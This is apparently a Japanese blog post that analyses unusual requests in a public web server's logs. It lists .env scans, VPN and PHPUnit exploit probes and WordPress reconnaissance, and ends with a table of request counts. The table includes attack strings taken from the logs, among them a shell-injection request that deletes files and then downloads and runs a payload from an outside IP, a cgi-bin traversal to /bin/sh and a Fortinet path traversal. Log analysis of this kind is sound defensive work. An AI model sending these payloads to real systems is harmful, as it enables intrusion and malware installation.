公開している web サーバのログから通常のアクセスではない通信について分析しました。
多かったリクエスト
.envの調査
/.env
VPN製品の脆弱性
複数のVPN製品の脆弱性に対しての調査する通信みたいです。
Palo Alto Networks (CVE-2019-1579)
Fortinet (CVE-2018-13379)
Pulse Secure (CVE-2019-11510)
/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
PHPUnitのevalをリモート実行
PHPのユニットテストツールのPHPUnitの脆弱性を利用してのeval()を実行しようとする通信
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
Wordpressの情報取集
ログイン画面の調査
/wp-login.php
/wp-admin/css/
wlwmanifest.xmlの調査
Windows Live Writerというツールの設定ファイルがあるかの調査
/wp1/wp-includes/wlwmanifest.xml
/wp/wp-includes/wlwmanifest.xml
/wordpress/wp-includes/wlwmanifest.xml
/web/wp-includes/wlwmanifest.xml
/test/wp-includes/wlwmanifest.xml
/site/wp-includes/wlwmanifest.xml
/cms/wp-includes/wlwmanifest.xml
/blog/wp-includes/wlwmanifest.xml
/shop/wp-includes/wlwmanifest.xml
/2019/wp-includes/wlwmanifest.xml
参考情報
JVNDB-2017-005280 - JVN iPedia - 脆弱性対策情報データベース
不審な通信の一覧
| uri | count |
|---|---|
| /test_404_page/ | 324 |
| /.env | 264 |
| /sellers.json | 140 |
| /wp-login.php | 129 |
| /uploads/ | 117 |
| /wp-admin/css/ | 116 |
| /sites/default/files/ | 116 |
| /.well-known/ | 116 |
| /images/ | 115 |
| /admin/controller/extension/extension/ | 115 |
| * | 99 |
| /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | 96 |
| /actuator/gateway/routes | 54 |
| /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession | 51 |
| mstshash=Domain | 48 |
| /boaform/admin/formLogin | 40 |
| /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application | 37 |
| mstshash=Administr | 36 |
| /xmlrpc.php?rsd | 36 |
| /wp1/wp-includes/wlwmanifest.xml | 34 |
| /wp/wp-includes/wlwmanifest.xml | 34 |
| /wordpress/wp-includes/wlwmanifest.xml | 34 |
| /web/wp-includes/wlwmanifest.xml | 34 |
| /test/wp-includes/wlwmanifest.xml | 34 |
| /site/wp-includes/wlwmanifest.xml | 34 |
| /cms/wp-includes/wlwmanifest.xml | 34 |
| /blog/wp-includes/wlwmanifest.xml | 34 |
| /Electron/download/windows/%5CProgram%20Files%5C3CX%20Phone%20System%5CData%5CDB%5Cbase%5C16384%5C16393 | 34 |
| \x00\x00\x00\x00\x00\x00\x00 | 33 |
| /shop/wp-includes/wlwmanifest.xml | 33 |
| /2019/wp-includes/wlwmanifest.xml | 33 |
| /post/wp-login.php | 30 |
| /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f | 30 |
| /owa/auth/logon.aspx | 30 |
| /wp-includes/wlwmanifest.xml | 29 |
| /owa/auth/x.js | 28 |
| /.git/config | 28 |
| 5.254.17.35:4444 | 25 |
| /wp2/wp-includes/wlwmanifest.xml | 25 |
| /website/wp-includes/wlwmanifest.xml | 25 |
| /sito/wp-includes/wlwmanifest.xml | 25 |
| /news/wp-includes/wlwmanifest.xml | 25 |
| /spywall/timeConfig.php | 23 |
| /actuator/health | 23 |
| /2020/wp-includes/wlwmanifest.xml | 23 |
| /up.php | 21 |
| /app-ads.txt | 21 |
| /.well-known/security.txt | 21 |
| google.com:443 | 20 |
| /_ignition/execute-solution | 19 |
| /wso.php | 18 |
| /sitemap.xml | 18 |
| /shell?cd+/tmp;rm+-rf+*;wget+185.216.71.192/jaws;sh+/tmp/jaws | 18 |
| /upload.php | 17 |
| /olux.php | 17 |
| /HNAP1/ | 17 |
| //.env | 17 |
| /wp-content/themes/seotheme/mar.php | 16 |
| /shell.php | 16 |
| /pools/default/buckets | 10 |
| /pools | 10 |
| /media/wp-includes/wlwmanifest.xml | 10 |
| /manager/html | 10 |
| /indoxploit.php | 10 |
| /hudson | 10 |
| /docs/cplugError.html/ | 10 |
| /doc.php | 10 |
| /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh | 10 |
| /__Additional | 10 |
| /Portal0000.htm | 10 |
| /Portal/Portal.mwsl | 10 |
| /CSS/Miniweb.css | 10 |
| /2018/wp-includes/wlwmanifest.xml | 10 |
| /0bef | 10 |
| /.DS_Store | 10 |
| 7 | 9 |
| /wp-includes/wp-class.php | 9 |
| /wp-includes/ID3/license.txt | 9 |
| /version | 9 |
